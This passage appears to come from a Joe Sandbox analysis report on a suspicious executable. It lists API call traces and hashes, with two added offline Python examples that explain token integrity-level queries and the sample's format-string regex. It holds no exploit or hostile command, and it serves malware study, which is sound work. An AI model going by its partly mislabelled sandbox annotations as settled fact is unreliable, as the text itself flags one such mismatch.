                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                    • String ID:
                                    • API String ID: 3824534824-0
                                    • Opcode ID: dd2c097b72e9464ae98036249fc50075c6fd29d3542d83877a0fec7e78f1036f
                                    • Instruction ID: 40dee7127dd3dbdab401af2f5168041c762ae6cc364438a3c4f8f59798522bfb
                                    • Opcode Fuzzy Hash: dd2c097b72e9464ae98036249fc50075c6fd29d3542d83877a0fec7e78f1036f
                                    • Instruction Fuzzy Hash: 9B1104B2D0820CBFCB11EBA8DC08EEA7FACEB89320F144365F915D3250D6759D44A7A0
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F58766
                                    • GetLastError.KERNEL32(?,00F5822A,?,?,?), ref: 00F58770
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00F5822A,?,?,?), ref: 00F5877F
                                    • RtlAllocateHeap.NTDLL(00000000,?,00F5822A), ref: 00F58786
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F5879D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 883493501-0
                                    • Opcode ID: a4348a17382b8acd83d90cd95e4fe5f8143b61ff55b5bd31d6f1d4121ec8ef69
                                    • Instruction ID: a3db47581010f956375d97564c286e384919f83afcbc2879fd72647561252348
                                    • Opcode Fuzzy Hash: a4348a17382b8acd83d90cd95e4fe5f8143b61ff55b5bd31d6f1d4121ec8ef69
                                    • Instruction Fuzzy Hash: 7D014F71600608EFDB104FA5EC88DA77B6DFF897A67200569F949D2160DA318C15EB60
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F65502
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F65510
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F65518
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F65522
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F6555E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: 2cdca8808d8b6eb632f1bb01a60c3dadae564c81d8066e86954d80465c63c1ce
                                    • Instruction ID: 0c1c021285042b335c1163cd7ff2b8ca5f743d9d6ca4e75ef8f2f9711a55efe9
                                    • Opcode Fuzzy Hash: 2cdca8808d8b6eb632f1bb01a60c3dadae564c81d8066e86954d80465c63c1ce
                                    • Instruction Fuzzy Hash: A1015B36C00A1DDBCF00DFE8E84D6EDBB78BB09B15F440496E902F2150DB309954E7A1
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F58608
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F58612
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F58621
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00F58628
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F5863E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 30dde5682290ada0360a26c03aea7d5b55359a556f80d5c5919a261f52bd22b3
                                    • Instruction ID: 683877722f09392e3d4eb413fd51de887d849a9e06a6c59c54e2998ff655c1af
                                    • Opcode Fuzzy Hash: 30dde5682290ada0360a26c03aea7d5b55359a556f80d5c5919a261f52bd22b3
                                    • Instruction Fuzzy Hash: DEF03C31201608AFEB100FA5DCCDEBB3BACEF897A5B100425FA45D7160DA619C4AEB60
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F58669
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F58673
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58682
                                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00F58689
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F5869F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 07a1ff82df0d4630984cfa67e850ecd91b93171648c2007725539f32f34d9c76
                                    • Instruction ID: 50bfa34c93ae96b20c5027bdd59476b4c3b9101464c034ebff2f0027bc75092f
                                    • Opcode Fuzzy Hash: 07a1ff82df0d4630984cfa67e850ecd91b93171648c2007725539f32f34d9c76
                                    • Instruction Fuzzy Hash: 96F04F71200308EFEB111FA5EC98EBB3BACEF897A5B140025FA45D6150DA619D49FB60
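The function at 00F58669 is the standard two-call GetTokenInformation idiom: call once with an empty buffer, check GetLastError for ERROR_INSUFFICIENT_BUFFER (122), allocate the reported size from the process heap (RtlAllocateHeap), then call again. One caveat before trusting the sandbox's label: in winnt.h TOKEN_INFORMATION_CLASS value 3 is TokenPrivileges, while TokenIntegrityLevel is 25 (0x19), so confirm the constant in the disassembly before deciding which structure the buffer holds. Assuming an integrity-level query, the following added example (not code from the sample or from Joe Sandbox) reproduces the idiom offline against a constructed stand-in for the API and decodes the TOKEN_MANDATORY_LABEL it returns; FakeTokenApi and every SID byte string are constructed for the demonstration.

```python
import struct

ERROR_INSUFFICIENT_BUFFER = 122           # winerror.h
SECURITY_MANDATORY_LABEL_AUTHORITY = 16   # integrity SIDs are S-1-16-<RID>

# winnt.h SECURITY_MANDATORY_*_RID values, ascending. The integrity level is the
# SID's last sub-authority and Windows compares levels numerically.
MANDATORY_RIDS = [
    (0x0000, "Untrusted"), (0x1000, "Low"), (0x2000, "Medium"),
    (0x2100, "Medium Plus"), (0x3000, "High"), (0x4000, "System"),
    (0x5000, "Protected Process"),
]


def make_sid(authority, sub_authorities):
    """Serialise a SID: Revision(1), SubAuthorityCount(1), 6-byte big-endian
    IdentifierAuthority, then little-endian DWORD sub-authorities."""
    header = bytes([1, len(sub_authorities)]) + authority.to_bytes(6, "big")
    return header + struct.pack("<%dI" % len(sub_authorities), *sub_authorities)


def parse_sid(buf):
    """Inverse of make_sid; rejects anything that is not a well-formed revision-1 SID."""
    if len(buf) < 8 or buf[0] != 1:
        raise ValueError("not a revision-1 SID")
    count = buf[1]
    if len(buf) < 8 + 4 * count:
        raise ValueError("truncated SID")
    authority = int.from_bytes(buf[2:8], "big")
    subs = struct.unpack("<%dI" % count, buf[8:8 + 4 * count])
    return authority, subs


def integrity_level(label_sid):
    """Map a mandatory-label SID to (rid, name). An unknown RID is reported as the
    highest well-known level it meets or exceeds, mirroring the numeric comparison."""
    authority, subs = parse_sid(label_sid)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY or not subs:
        raise ValueError("not a mandatory label SID")
    rid = subs[-1]
    name = "Untrusted"
    for floor, level in MANDATORY_RIDS:
        if rid >= floor:
            name = level
    return rid, name


class FakeTokenApi:
    """Constructed stand-in for GetTokenInformation's buffer contract (not the Win32 API).
    It returns a 32-bit TOKEN_MANDATORY_LABEL: PSID (here the offset of the SID inside
    the blob), DWORD Attributes, then the SID bytes themselves."""

    def __init__(self, label_sid):
        attrs = 0x20 | 0x40   # SE_GROUP_INTEGRITY | SE_GROUP_INTEGRITY_ENABLED
        self.blob = struct.pack("<II", 8, attrs) + label_sid
        self.last_error = 0

    def get_token_information(self, buf_len):
        """Returns (ok, data, required_size) like the real API's BOOL/ReturnLength pair."""
        if buf_len < len(self.blob):
            self.last_error = ERROR_INSUFFICIENT_BUFFER
            return False, None, len(self.blob)
        self.last_error = 0
        return True, self.blob, len(self.blob)


def query_integrity_level(api):
    """The two-call idiom seen at 00F58669 / 00F5869F: probe, check error, allocate, query."""
    ok, _, needed = api.get_token_information(0)
    if ok or api.last_error != ERROR_INSUFFICIENT_BUFFER:
        raise OSError("size probe did not fail with ERROR_INSUFFICIENT_BUFFER")
    ok, blob, _ = api.get_token_information(needed)   # RtlAllocateHeap(needed) in the sample
    if not ok:
        raise OSError("second GetTokenInformation call failed")
    sid_offset, _attributes = struct.unpack("<II", blob[:8])
    return integrity_level(blob[sid_offset:])


if __name__ == "__main__":
    print(query_integrity_level(FakeTokenApi(make_sid(16, [0x2000]))))
```

Feeding a non-integrity SID such as S-1-5-32-544 (BUILTIN\Administrators) to integrity_level raises ValueError, which is the check to keep when the class constant turns out not to be TokenIntegrityLevel.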
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 00F5C6BA
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F5C6D1
                                    • MessageBeep.USER32(00000000), ref: 00F5C6E9
                                    • KillTimer.USER32(?,0000040A), ref: 00F5C705
                                    • EndDialog.USER32(?,00000001), ref: 00F5C71F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 63e7cb1dc87e235eb947b56814172fdca612523ffe50372552ac681ca6676a75
                                    • Instruction ID: 04d043a461cabf4677b4dbec8cd1db25a43632693f8bb25dd4bb2cd98b65a48f
                                    • Opcode Fuzzy Hash: 63e7cb1dc87e235eb947b56814172fdca612523ffe50372552ac681ca6676a75
                                    • Instruction Fuzzy Hash: 250144309007089FEB215B20ED4EBA67778BB04706F000669B646E14E1EBE4695CAF90
                                    APIs
                                    • EndPath.GDI32(?), ref: 00F013BF
                                    • StrokeAndFillPath.GDI32(?,?,00F3BAD8,00000000,?), ref: 00F013DB
                                    • SelectObject.GDI32(?,00000000), ref: 00F013EE
                                    • DeleteObject.GDI32 ref: 00F01401
                                    • StrokePath.GDI32(?), ref: 00F0141C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 3b5eb316a4396c3788c04ee8b905de8bcd8808b5e7606e10d7f8ede50e0a41b5
                                    • Instruction ID: 52ab474ab1b0746fe0a4b7dfd0b110e298f5fce9b823459180650175db0d09bb
                                    • Opcode Fuzzy Hash: 3b5eb316a4396c3788c04ee8b905de8bcd8808b5e7606e10d7f8ede50e0a41b5
                                    • Instruction Fuzzy Hash: 7AF0C93000860CEFDB119F26EE0DBA83BA5BF01326F148224E429860F1C7368999FF50
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F58E7F
                                    • CloseHandle.KERNEL32(?), ref: 00F58E94
                                    • CloseHandle.KERNEL32(?), ref: 00F58E9C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F58EA5
                                    • HeapFree.KERNEL32(00000000), ref: 00F58EAC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                    • String ID:
                                    • API String ID: 3751786701-0
                                    • Opcode ID: 07c4a6683eb812edaf4c303597b5b18e04cc21b9c7003a538af203067e9a0251
                                    • Instruction ID: 98210cbed9a9b1b395ac69c2c48f6ba8d0334c326caaf5aef884e3bff8000aa1
                                    • Opcode Fuzzy Hash: 07c4a6683eb812edaf4c303597b5b18e04cc21b9c7003a538af203067e9a0251
                                    • Instruction Fuzzy Hash: C6E05276104509FFDA011FE5EC0C9AABB69FB89762B508631F219C1474CB329469EB50
                                    APIs
                                      • Part of subcall function 00F20FF6: std::exception::exception.LIBCMT ref: 00F2102C
                                      • Part of subcall function 00F20FF6: __CxxThrowException@8.LIBCMT ref: 00F21041
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F07BB1: _memmove.LIBCMT ref: 00F07C0B
                                    • __swprintf.LIBCMT ref: 00F1302D
                                    Strings
                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F12EC6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                    • API String ID: 1943609520-557222456
                                    • Opcode ID: 0ca11a13035a88538cd81e5ea151fb5dcd22c3c607880d66c98f05fb5f8f43e8
                                    • Instruction ID: d4246e1692b44636ea060f699d8b79ca3cc19c367a899a33d2dcab7956323164
                                    • Opcode Fuzzy Hash: 0ca11a13035a88538cd81e5ea151fb5dcd22c3c607880d66c98f05fb5f8f43e8
                                    • Instruction Fuzzy Hash: 13916D715083019FC718EF24DC85CAEB7E4EF99760F00495DF8819B2A1EB64EE48EB52
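The regular expression at xref 00F12EC6 is the grammar the __swprintf wrapper at 00F1302D uses to pick escape sequences, the literal %% and printf-style conversions out of a format string, a detail consistent with the AutoIt runtime flagged in the signatures above. Worth noting is the accepted conversion set [diouxXeEfgGs]: %n, %c, %p and double length modifiers such as %lld are not recognised. The example below is added here and is not code from the sample; it feeds that exact regex to Python's re module to tokenise a format string and to count the arguments it consumes (each * width or precision takes one extra), which is the check a caller needs before handing an externally influenced format to the formatter. The names tokenize, expected_arg_count, unrecognised_percent_sequences and check_arguments are chosen for this example.

```python
import re

# Grammar copied verbatim from the sample's string table (xref 00F12EC6). Three alternatives:
#   1. an escape sequence: a backslash followed by one of \ n r t
#   2. a literal percent sign written as %%
#   3. a conversion: %[flag][width][.precision][length]type
FORMAT_TOKEN = re.compile(
    r"\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]"
)


def tokenize(fmt):
    """Return (kind, text) for every token the grammar recognises, in order of appearance."""
    tokens = []
    for m in FORMAT_TOKEN.finditer(fmt):
        text = m.group(0)
        if text.startswith("\\"):
            kind = "escape"
        elif text == "%%":
            kind = "percent"
        else:
            kind = "conversion"
        tokens.append((kind, text))
    return tokens


def expected_arg_count(fmt):
    """Arguments the caller must supply: one per conversion, plus one for each '*'
    used as width (group 1) or precision (group 2)."""
    needed = 0
    for m in FORMAT_TOKEN.finditer(fmt):
        text = m.group(0)
        if not text.startswith("%") or text == "%%":
            continue
        needed += 1
        if m.group(1) == "*":
            needed += 1
        if m.group(2) == ".*":
            needed += 1
    return needed


def unrecognised_percent_sequences(fmt):
    """Return the '%' sequences the grammar does not cover (e.g. '%n', '%c', '%lld').
    These are the ones whose handling depends on the formatter, not on this regex."""
    covered = [(m.start(), m.end()) for m in FORMAT_TOKEN.finditer(fmt)]
    leftovers = []
    for i, ch in enumerate(fmt):
        if ch == "%" and not any(s <= i < e for s, e in covered):
            leftovers.append(fmt[i:i + 2])
    return leftovers


def check_arguments(fmt, args):
    """Accept a format only if the supplied argument list covers every conversion
    and nothing outside the grammar is present. Returns (ok, needed, stray)."""
    needed = expected_arg_count(fmt)
    stray = unrecognised_percent_sequences(fmt)
    return (needed <= len(args) and not stray), needed, stray


if __name__ == "__main__":
    sample = "Value: %-8.3f units\\n%*.*s%%"   # constructed input; '\\n' is a two-character escape
    print(tokenize(sample))
    print(expected_arg_count(sample))
    print(check_arguments("%s %s", ["only-one"]))
```

The regex makes tokenization deterministic, but it does not validate the argument list; that is what check_arguments adds, and it also surfaces anything outside the grammar (a bare %n, for instance) rather than silently passing it through.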
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00F252DD
                                      • Part of subcall function 00F30340: __87except.LIBCMT ref: 00F3037B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 1e5d661d4f07136f90cce7f1cb4d73c288be9dfb769011b420befa1e52abaf39
                                    • Instruction ID: 4d0d3e8af5716c673cf7478d163a3e44fed85f9c19385661fac67390fc2481ac
                                    • Opcode Fuzzy Hash: 1e5d661d4f07136f90cce7f1cb4d73c288be9dfb769011b420befa1e52abaf39
                                    • Instruction Fuzzy Hash: 98517862E1D705D7CB10F724ED6137E3B949B00B70F20895AE485862EAEF78CDD4BA46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #$+
                                    • API String ID: 0-2552117581
                                    • Opcode ID: cbbc7f8350987432b8e718748d8e4138b87decfa142d00d80251cd827319fabc
                                    • Instruction ID: d0f34b9b89128c24972bd83793e43f4a7de09b36cfa870fc665ba2b49333be52
                                    • Opcode Fuzzy Hash: cbbc7f8350987432b8e718748d8e4138b87decfa142d00d80251cd827319fabc
                                    • Instruction Fuzzy Hash: CE515373908215CFCF14DF28D8986FA7BB0EF5A720F140051ED809B2A1DB389C4AEB60
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$_memmove
                                    • String ID: ERCP
                                    • API String ID: 2532777613-1384759551
                                    • Opcode ID: e18a6293967ccbcef805ccf35a0d956a6408e27318b15e71c82aa9a87c1f5866
                                    • Instruction ID: 5364134bc47b62218bc8a2d09d16125a7be818c3c5050e467245bd637529861e
                                    • Opcode Fuzzy Hash: e18a6293967ccbcef805ccf35a0d956a6408e27318b15e71c82aa9a87c1f5866
                                    • Instruction Fuzzy Hash: 1B518172D007199BDB24CF65C881BEABBF8FF04724F20856EEA4AC7241E775A584DB50
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F5DAFB
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F5DB0C
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F5DB8E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
